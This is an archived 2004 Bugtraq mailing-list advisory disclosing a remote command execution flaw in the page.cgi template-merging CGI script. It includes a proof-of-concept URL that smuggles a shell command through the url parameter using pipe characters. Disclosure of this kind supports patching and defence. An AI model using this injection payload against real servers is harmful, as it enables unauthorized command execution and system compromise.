Remote Command Execution

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Remote Command Execution
From: Francisco Alisson <dominusvis@xxxxxxxxxxxxxx>
Date: 6 Aug 2004 05:10:28 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


Script affected: page.cgi - content/template merging CGI
Author: Andrew Kilpatrick

We can execute arbitrary commands with same id of the webserver:

http://www.vulnerable.com/page.cgi?url=.html|id|

Thanks :)

<Dominus_Vis>
[Infektion Group]
irc.phey.net -j #infektion

Prev by Date: GNU/Linux 'info Buffer Overflow
Next by Date: RE: [Full-Disclosure] Clear text password exposure in Datakey's tokens and smartcards
Previous by thread: Re: GNU/Linux 'info Buffer Overflow
Next by thread: Remote Command Execution
Index(es):
- Date
- Thread